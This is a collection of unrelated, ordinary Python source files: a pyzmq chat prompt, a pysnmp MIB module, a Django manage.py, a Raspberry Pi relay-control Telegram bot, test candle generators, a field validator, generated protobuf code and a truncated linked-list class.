required = False, help = 'genome info FTP (default: %s)' % (ftp))
parser.add_argument(\
'-m', default = 'md5sum', type = str,
required = False, help = 'md5 program (default = md5sum, md5 on Mac)')
parser.add_argument(\
'-t', default = 3, type = int,
required = False, help = 'threads (default = 3)')
parser.add_argument(\
'--convert', action = 'store_true', required = False,
help = 'convert missing accessions using Entrez Direct (slow; requires `esearch` and `efetch`)')
parser.add_argument(\
'--test', action = 'store_true', required = False,
help = 'look for genomes, but do not download them')
args = vars(parser.parse_args())
if args['e'] == 'False' or args['e'] == 'FALSE':
args['e'] = False
if args['g'][0] == '-':
args['g'] = [i.strip() for i in sys.stdin]
print('# downloading genome info:', args['i'])
download(args)
|
py | b4112283105d2e160303cfd03a07fd64cec34e4e | """The prompt part of a simply two process chat app."""
#
# Copyright (c) 2010 Andrew Gwozdziewycz
#
# This file is part of pyzmq.
#
# pyzmq is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# pyzmq is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import zmq
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
def main(addr, account):
ctx = zmq.Context()
socket = ctx.socket(zmq.PUB)
socket.bind(addr)
while True:
message = raw_input("%s> " % account)
socket.send_multipart((account, message))
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("usage: prompt.py <address> <username>")
raise SystemExit
main(sys.argv[1], sys.argv[2])
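# A minimal subscriber counterpart (sketch, not part of the original file),
# showing how the published (account, message) frames can be received:
#   ctx = zmq.Context()
#   sub = ctx.socket(zmq.SUB)
#   sub.connect(addr)
#   sub.setsockopt(zmq.SUBSCRIBE, b"")
#   account, message = sub.recv_multipart()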
|
py | b411239d8424def743c4f97001f58516e8f61f99 | #
# PySNMP MIB module NETSCREEN-ZONE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NETSCREEN-ZONE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:11:00 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ValueSizeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion")
netscreenZone, = mibBuilder.importSymbols("NETSCREEN-SMI", "netscreenZone")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
ModuleIdentity, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Gauge32, MibIdentifier, iso, IpAddress, Counter64, Unsigned32, Counter32, ObjectIdentity, TimeTicks, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Gauge32", "MibIdentifier", "iso", "IpAddress", "Counter64", "Unsigned32", "Counter32", "ObjectIdentity", "TimeTicks", "Bits")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
netscreenZoneMibModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 3224, 8, 0))
netscreenZoneMibModule.setRevisions(('2004-05-03 00:00', '2004-03-03 00:00', '2003-11-13 00:00', '2001-09-28 00:00', '2000-05-08 00:00',))
if mibBuilder.loadTexts: netscreenZoneMibModule.setLastUpdated('200405032022Z')
if mibBuilder.loadTexts: netscreenZoneMibModule.setOrganization('Juniper Networks, Inc.')
nsZoneCfg = MibIdentifier((1, 3, 6, 1, 4, 1, 3224, 8, 1))
nsZoneCfgTable = MibTable((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1), )
if mibBuilder.loadTexts: nsZoneCfgTable.setStatus('current')
nsZoneCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1), ).setIndexNames((0, "NETSCREEN-ZONE-MIB", "nsZoneCfgId"))
if mibBuilder.loadTexts: nsZoneCfgEntry.setStatus('current')
nsZoneCfgId = MibTableColumn((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsZoneCfgId.setStatus('current')
nsZoneCfgName = MibTableColumn((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsZoneCfgName.setStatus('current')
nsZoneCfgType = MibTableColumn((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4))).clone(namedValues=NamedValues(("regular", 0), ("layer2", 1), ("tunnel", 2), ("null", 3), ("func", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsZoneCfgType.setStatus('current')
nsZoneCfgVsys = MibTableColumn((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsZoneCfgVsys.setStatus('current')
mibBuilder.exportSymbols("NETSCREEN-ZONE-MIB", nsZoneCfgVsys=nsZoneCfgVsys, nsZoneCfgName=nsZoneCfgName, nsZoneCfgTable=nsZoneCfgTable, nsZoneCfgEntry=nsZoneCfgEntry, PYSNMP_MODULE_ID=netscreenZoneMibModule, nsZoneCfgType=nsZoneCfgType, nsZoneCfg=nsZoneCfg, netscreenZoneMibModule=netscreenZoneMibModule, nsZoneCfgId=nsZoneCfgId)
|
py | b411242121fd86697cce125eff34296909f3f55f | #!/usr/bin/env python
# The Expat License
#
# Copyright (c) 2017, Shlomi Fish
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
if sys.version_info > (3,):
long = int
xrange = range
MOD = int(os.environ["MOD"])
mods = []
with open('mod_groups.txt') as f:
for line in f:
nums = [long(i) for i in line.rstrip('\n').split(' ')]
count = nums.pop(0)
for n in nums:
for i in xrange(count):
mods.append(n)
my_len = len(mods)
ret = 0
# recursively enumerate all subsets of mods: at each position either skip
# mods[depth] or add it to the running sum modulo MOD; every subset whose sum
# is congruent to 0 mod MOD is printed and counted.
def rec(depth, m, stack):
if depth == my_len:
if m == 0:
global ret
print(stack)
ret += 1
else:
rec(depth+1, m, stack)
rec(depth+1, (m+mods[depth]) % MOD, stack + [mods[depth]])
return
rec(0, 0, [])
ret -= 1  # exclude the empty subset, which always sums to 0
print("Num = %d" % (ret))
|
py | b411244c9aa30b0ce3886ceeef22c9e1738809b1 | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'CollegeERP.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
py | b41124d9e3895c8038635865fa95e18d2ed9a6c9 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Telegram module, core of a bot
"""
# ToDo: add music player
# ToDo: add RPi controls & status
import telebot
import helpers
import ui
import gpio
from threading import Thread
from time import sleep
bot = telebot.TeleBot(helpers.token)
err = '\xf0\x9f\x98\xa3'
ok = '\xf0\x9f\x98\x89'
verbose = True
watchdog = False
def convert(state):
if state:
return 'Enabled'
return 'Disabled'
def send_message(msg):
bot.send_message(helpers.admin_uid, msg, parse_mode='HTML')
def _watchdog():
global watchdog
while watchdog:
if helpers.is_pc_up():
send_message('Hey! PC now is Up and ready for use!\n\nWatchdog now is disabled {}'.format(ok))
break
sleep(1)
watchdog = False
@bot.message_handler(commands=['menu', 'start', 'show', 'm'])
def _(msg):
if msg.chat.id != helpers.admin_uid: return
helpers.log('message_handler', 'Call menu from {}'.format(msg.chat.id))
bot.reply_to(msg, 'Welcome <3', reply_markup=ui.show_keyboard())
@bot.message_handler(commands=['hide'])
def _(msg):
if msg.chat.id != helpers.admin_uid: return
bot.reply_to(msg, ok, reply_markup=ui.hide_keyboard())
@bot.message_handler(content_types=['text'])
def _(msg):
if msg.chat.id != helpers.admin_uid: return
global verbose, watchdog
if msg.text == 'Status':
bot.reply_to(msg,
ui.status.format(
convert(gpio.get_state(gpio.relay_pin1)),
convert(gpio.get_state(gpio.relay_pin2)),
convert(gpio.get_state(gpio.relay_pin3)),
convert(gpio.get_state(gpio.relay_pin4)),
convert(helpers.is_pc_up()),
convert(verbose),
convert(watchdog)
),
parse_mode='HTML')
return
if msg.text == 'Turn PC':
if helpers.is_pc_up():
if not (gpio.get_state(gpio.relay_pin1) and
gpio.get_state(gpio.relay_pin2) and
gpio.get_state(gpio.relay_pin3)):
bot.reply_to(msg, 'Relays already off')
return
gpio.hold_off(gpio.relay_pin1)
gpio.hold_off(gpio.relay_pin2)
gpio.hold_off(gpio.relay_pin3)
gpio.hold_off(gpio.relay_pin4)
bot.reply_to(msg, 'Turning off relays')
else:
bot.reply_to(msg, 'Turning on PC')
gpio.hold_on(gpio.relay_pin1)
sleep(0.3)
gpio.hold_on(gpio.relay_pin2)
sleep(0.3)
gpio.hold_on(gpio.relay_pin3)
sleep(1)
gpio.push(gpio.pc_pin)
return
if msg.text == 'Turn light':
if gpio.get_state(gpio.relay_pin4):
gpio.hold_off(gpio.relay_pin4)
else:
gpio.hold_on(gpio.relay_pin4)
bot.reply_to(msg, 'Light now is <i>{}</i>'.format(convert(gpio.get_state(gpio.relay_pin4))), parse_mode='HTML')
return
if msg.text == 'Verbose':
if not verbose:
verbose = True
else:
verbose = False
bot.reply_to(msg, 'Verbose mode: <i>{}</i>'.format(convert(verbose)), parse_mode='HTML')
return
if msg.text == 'Watchdog':
if helpers.is_pc_up():
bot.reply_to(msg, 'Seems what PC already On.. {}'.format('\xf0\x9f\x98\xb3'))
return
if not watchdog:
watchdog = True
# Sorry me God for that..
Thread(target=_watchdog, args=()).start()
else:
watchdog = False
bot.reply_to(msg, 'Watchdog mode: <i>{}</i>'.format(convert(watchdog)), parse_mode='HTML')
helpers.log('message_handler', u'Receive message from {} | Text: {}'.format(msg.chat.id, msg.text))
def Start():
helpers.log('Start()', 'Run Start() function at core.telegram')
try:
bot.polling(True)
except Exception as ex:
helpers.log('Start()', 'Crash Start() function in core.telegram ({})\n\n{}'.format(__file__, ex), True)
|
py | b4112514730212a12966bc407ccb08184e88807e | from random import randint
from typing import Union
import numpy as np
# 2021-01-01T00:00:00+00:00
first_timestamp = 1609459080000
open_price = randint(40, 100)
close_price = randint(open_price, 110) if randint(0, 1) else randint(
30, open_price)
max_price = max(open_price, close_price)
high_price = max_price if randint(0, 1) else randint(max_price, max_price + 10)
min_price = min(open_price, close_price)
low_price = min_price if randint(0, 1) else randint(min_price, min_price + 10)
def range_candles(count: int) -> np.ndarray:
"""
Generates a range of candles with random values.
"""
fake_candle(reset=True)
arr = np.zeros((count, 6))
for i in range(count):
arr[i] = fake_candle()
return arr
def candles_from_close_prices(prices: Union[list, range]) -> np.ndarray:
"""
Generates a range of candles from a list of close prices.
The first candle has the timestamp of "2021-01-01T00:00:00+00:00"
"""
fake_candle(reset=True)
global first_timestamp
arr = []
prev_p = np.nan
for p in prices:
# first prev_p
if np.isnan(prev_p):
prev_p = p - 0.5
first_timestamp += 60000
open_p = prev_p
close_p = p
high_p = max(open_p, close_p)
low_p = min(open_p, close_p)
vol = randint(0, 200)
arr.append([first_timestamp, open_p, close_p, high_p, low_p, vol])
# save prev_p for next candle
prev_p = p
return np.array(arr)
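# Usage sketch (assumed, not from the original module); every returned row is
# [timestamp, open, close, high, low, volume]:
#   candles = range_candles(10)                        # 10 random 1-minute candles
#   candles = candles_from_close_prices([10, 11, 12])  # closes fixed at 10, 11, 12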
def fake_candle(attributes: dict = None, reset: bool = False) -> np.ndarray:
global first_timestamp
global open_price
global close_price
global max_price
global high_price
global min_price
global low_price
if reset:
first_timestamp = 1609459080000
open_price = randint(40, 100)
close_price = randint(open_price, 110)
high_price = max(open_price, close_price)
low_price = min(open_price, close_price)
if attributes is None:
attributes = {}
first_timestamp += 60000
open_price = close_price
close_price += randint(1, 8)
high_price = max(open_price, close_price)
low_price = min(open_price - 1, close_price)
volume = randint(1, 100)
timestamp = first_timestamp
return np.array([
attributes.get('timestamp', timestamp),
attributes.get('open', open_price),
attributes.get('close', close_price),
attributes.get('high', high_price),
attributes.get('low', low_price),
attributes.get('volume', volume)
], dtype=np.float64)
|
py | b411268a6d3efa65c50f7cb2209a2b8986e42cf5 | import pickle
from typing import Any, Iterable
from .fuzzyfield import FuzzyField
from .errors import DomainError, FieldTypeError, MalformedFieldError
from .numbers import Float
_float_parser = Float()
class Domain(FuzzyField):
"""A field which can only accept a specific set of values
:param choices:
collection of acceptable values. The default needs not be included.
:param bool case_sensitive:
ignore case when validating string input.
The output will be converted to the case listed in choices.
:param bool passthrough:
If True, store the choices object by reference and assume it will
change after this class has been initialised.
The change will be reflected in the next parsed value.
Example::
v1 = String("ID", unique=True)
v2 = Domain("CrossRef", domain=v1.seen_values, passthrough=True)
In the above example, the field 'CrossRef' must be one of the values
that already appeared for the field 'ID'.
passthrough comes with a performance cost; set it to False
(the default) to allow for optimisations. This assumes that neither
the choices collection nor the objects it contains will change in the
future.
:param kwargs:
extra parameters for :class:`FuzzyField`
"""
choices: Iterable
case_sensitive: bool
passthrough: bool
def __init__(self, choices: Iterable, *, case_sensitive: bool = True,
passthrough: bool = False, **kwargs):
super().__init__(**kwargs)
self.choices = choices
self.case_sensitive = case_sensitive
self.passthrough = passthrough
if not passthrough:
self._parse_choices()
def _parse_choices(self) -> None:
"""Parse choices and update several cache fields.
This needs to be invoked after every time choices changes.
"""
self._has_numeric_choices = False
self._choices_map = {}
for v in self.choices:
k = v
if isinstance(v, str) and not self.case_sensitive:
k = v.lower()
elif isinstance(v, (int, float, complex)):
self._has_numeric_choices = True
try:
self._choices_map[k] = v
except TypeError:
k = pickle.dumps(v, protocol=pickle.HIGHEST_PROTOCOL)
self._choices_map[k] = v
# Build sorted list of choices, used for string representations
try:
sorted_choices = sorted(self.choices)
except TypeError:
# choices is a mix of incomparable types, e.g. (1, '2')
sorted_choices = sorted(self.choices, key=str)
self._choices_str = ",".join(str(choice) for choice in sorted_choices)
if len(self._choices_str) > 200:
self._choices_str = self._choices_str[:200] + '...'
def validate(self, value: Any) -> Any:
"""Validate and convert the input
:raises DomainError:
if the value is not one of the defined choices
"""
if self.passthrough:
self._parse_choices()
k = value
if isinstance(value, str) and not self.case_sensitive:
k = k.lower()
# This first lookup quickly satisfies most use cases.
# Note that this returns the representation provided in the choices;
# e.g. Domain(choices=[1]).parse(1.0) returns 1
try:
return self._choices_map[k]
except KeyError:
pass
except TypeError:
# Unhashable
k = pickle.dumps(k, protocol=pickle.HIGHEST_PROTOCOL)
try:
return self._choices_map[k]
except KeyError:
pass
# Deal with string representation of numbers
if self._has_numeric_choices and isinstance(k, str):
try:
k = _float_parser.validate(k)
except (FieldTypeError, MalformedFieldError):
pass
else:
try:
return self._choices_map[k]
except KeyError:
pass
raise DomainError(self.name, value, self._choices_str)
@property
def sphinxdoc(self) -> str:
if self.passthrough:
if not self.choices:
return "Choice from a domain (dynamically defined at runtime)"
self._parse_choices()
return f"Any of: {self._choices_str}"
|
py | b411274910229a90433c4588fd5b10fc8e2cfd0b | import healpy as hp
import numpy as np
import matplotlib.pyplot as plt
# Set the number of sources and the coordinates for the input
nsources = int(20000)
nside = 8
npix = hp.nside2npix(nside)
# Coordinates and the density field f
#thetas = np.random.random(nsources) * np.pi
#phis = np.random.random(nsources) * np.pi * 2.
fs = np.random.randn(nsources)
with open("/home/tuos/tmp/tmp/newSTEG/m1000/eventFile2.txt") as inputFile:
lines = inputFile.readlines()
#print (lines[1].split()[1])
thetas=[]
phis=[]
for i in range(nsources):
thetas.append(float(lines[i].split()[1]))
phis.append(float(lines[i].split()[2]))
#print(thetas)
# Go from HEALPix coordinates to indices
indices = hp.ang2pix(nside, thetas, phis)
# Initialize the map and fill it with the values
hpxmap = np.zeros(npix, dtype=float)
for i in range(nsources):
#hpxmap[indices[i]] += fs[i]
hpxmap[indices[i]] += 1.0
DPI = 100
SIZE = 400
# Inspect the map
#plt.figure(1)
'''
hp.mollview(hpxmap, xsize = SIZE)
plt.savefig("plot_toyModel_2000mAll.png", dpi = DPI)
'''
#plt.figure(2)
# Get the power spectrum
Cl = hp.anafast(hpxmap)
#print(Cl)
plt.plot(Cl)
plt.ylabel('C_{l}')
plt.savefig('plot_toyModel_power_spectrumAll.png')
|
py | b41127ac2ddd68ccb9ce6fb49456ca78c682460b | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: pyatv/mrp/protobuf/NowPlayingInfo.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='pyatv/mrp/protobuf/NowPlayingInfo.proto',
package='',
syntax='proto2',
serialized_options=None,
serialized_pb=_b('\n\'pyatv/mrp/protobuf/NowPlayingInfo.proto\"\xbd\x04\n\x0eNowPlayingInfo\x12\r\n\x05\x61lbum\x18\x01 \x01(\t\x12\x0e\n\x06\x61rtist\x18\x02 \x01(\t\x12\x10\n\x08\x64uration\x18\x03 \x01(\x01\x12\x13\n\x0b\x65lapsedTime\x18\x04 \x01(\x01\x12\x14\n\x0cplaybackRate\x18\x05 \x01(\x02\x12.\n\nrepeatMode\x18\x06 \x01(\x0e\x32\x1a.NowPlayingInfo.RepeatMode\x12\x30\n\x0bshuffleMode\x18\x07 \x01(\x0e\x32\x1b.NowPlayingInfo.ShuffleMode\x12\x11\n\ttimestamp\x18\x08 \x01(\x01\x12\r\n\x05title\x18\t \x01(\t\x12\x18\n\x10uniqueIdentifier\x18\n \x01(\x04\x12\x17\n\x0fisExplicitTrack\x18\x0b \x01(\x08\x12\x12\n\nisMusicApp\x18\x0c \x01(\x08\x12\x1e\n\x16radioStationIdentifier\x18\r \x01(\x03\x12\x18\n\x10radioStationHash\x18\x0e \x01(\t\x12\x18\n\x10radioStationName\x18\x0f \x01(\t\x12\x19\n\x11\x61rtworkDataDigest\x18\x10 \x01(\x0c\x12\x14\n\x0cisAlwaysLive\x18\x11 \x01(\x08\x12\x17\n\x0fisAdvertisement\x18\x12 \x01(\x08\"+\n\nRepeatMode\x12\x0b\n\x07Unknown\x10\x00\x12\x07\n\x03One\x10\x01\x12\x07\n\x03\x41ll\x10\x02\"9\n\x0bShuffleMode\x12\n\n\x06Unkown\x10\x00\x12\x07\n\x03Off\x10\x01\x12\n\n\x06\x41lbums\x10\x02\x12\t\n\x05Songs\x10\x03')
)
_NOWPLAYINGINFO_REPEATMODE = _descriptor.EnumDescriptor(
name='RepeatMode',
full_name='NowPlayingInfo.RepeatMode',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='Unknown', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='One', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='All', index=2, number=2,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=515,
serialized_end=558,
)
_sym_db.RegisterEnumDescriptor(_NOWPLAYINGINFO_REPEATMODE)
_NOWPLAYINGINFO_SHUFFLEMODE = _descriptor.EnumDescriptor(
name='ShuffleMode',
full_name='NowPlayingInfo.ShuffleMode',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='Unkown', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Off', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Albums', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='Songs', index=3, number=3,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=560,
serialized_end=617,
)
_sym_db.RegisterEnumDescriptor(_NOWPLAYINGINFO_SHUFFLEMODE)
_NOWPLAYINGINFO = _descriptor.Descriptor(
name='NowPlayingInfo',
full_name='NowPlayingInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='album', full_name='NowPlayingInfo.album', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='artist', full_name='NowPlayingInfo.artist', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='duration', full_name='NowPlayingInfo.duration', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='elapsedTime', full_name='NowPlayingInfo.elapsedTime', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='playbackRate', full_name='NowPlayingInfo.playbackRate', index=4,
number=5, type=2, cpp_type=6, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='repeatMode', full_name='NowPlayingInfo.repeatMode', index=5,
number=6, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='shuffleMode', full_name='NowPlayingInfo.shuffleMode', index=6,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='timestamp', full_name='NowPlayingInfo.timestamp', index=7,
number=8, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='title', full_name='NowPlayingInfo.title', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='uniqueIdentifier', full_name='NowPlayingInfo.uniqueIdentifier', index=9,
number=10, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isExplicitTrack', full_name='NowPlayingInfo.isExplicitTrack', index=10,
number=11, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isMusicApp', full_name='NowPlayingInfo.isMusicApp', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radioStationIdentifier', full_name='NowPlayingInfo.radioStationIdentifier', index=12,
number=13, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radioStationHash', full_name='NowPlayingInfo.radioStationHash', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='radioStationName', full_name='NowPlayingInfo.radioStationName', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='artworkDataDigest', full_name='NowPlayingInfo.artworkDataDigest', index=15,
number=16, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isAlwaysLive', full_name='NowPlayingInfo.isAlwaysLive', index=16,
number=17, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='isAdvertisement', full_name='NowPlayingInfo.isAdvertisement', index=17,
number=18, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
_NOWPLAYINGINFO_REPEATMODE,
_NOWPLAYINGINFO_SHUFFLEMODE,
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=44,
serialized_end=617,
)
_NOWPLAYINGINFO.fields_by_name['repeatMode'].enum_type = _NOWPLAYINGINFO_REPEATMODE
_NOWPLAYINGINFO.fields_by_name['shuffleMode'].enum_type = _NOWPLAYINGINFO_SHUFFLEMODE
_NOWPLAYINGINFO_REPEATMODE.containing_type = _NOWPLAYINGINFO
_NOWPLAYINGINFO_SHUFFLEMODE.containing_type = _NOWPLAYINGINFO
DESCRIPTOR.message_types_by_name['NowPlayingInfo'] = _NOWPLAYINGINFO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
NowPlayingInfo = _reflection.GeneratedProtocolMessageType('NowPlayingInfo', (_message.Message,), {
'DESCRIPTOR' : _NOWPLAYINGINFO,
'__module__' : 'pyatv.mrp.protobuf.NowPlayingInfo_pb2'
# @@protoc_insertion_point(class_scope:NowPlayingInfo)
})
_sym_db.RegisterMessage(NowPlayingInfo)
# @@protoc_insertion_point(module_scope)
|
py | b41128f962f687dd6ca7073ec6c41130c3425eb7 | class SinglyLinkedListNode():
def __init__(self):
self.data = None
self.next = None
class SinglyLinkedList():
def __init__(self):
self.head = None
self.size = 0
def prepend(self, value):
"""
Add an element at the head of the list. Point the new element's 'next'
at the previous head, shifting all remaining elements to the right.
:param value: data to add
"""
new_node = SinglyLinkedListNode()
new_node.data = value
new_node.next = self.head
self.head = new_node
self.size += 1
def append(self, value):
"""
Add an element at the tail of the list. Update the previous final
element's 'next' to point to the new element.
:param value: data to add
"""
new_node = SinglyLinkedListNode()
new_node.data = value
curr_node = self.head
prev_node = None
while curr_node is not None:
prev_node = curr_node
curr_node = curr_node.next
if prev_node:
prev_node.next = new_node
else:
self.head = new_node
self.size += 1
def insert(self, value):
"""
Insert an element in the list.
This method exists for convenient naming.
:param value: data to add
"""
self.prepend(value)
def insert_at(self, value, position):
"""
Insert an element at a specified position.
This method exists for convenient naming.
:param value: data to add
:param position: index to insert at
"""
if position >= self.size:
raise IndexError
new_node = SinglyLinkedListNode()
new_node.data = value
curr_node = self.head
prev_node = None
curr_index = 0
while curr_index < position:
prev_node = curr_node
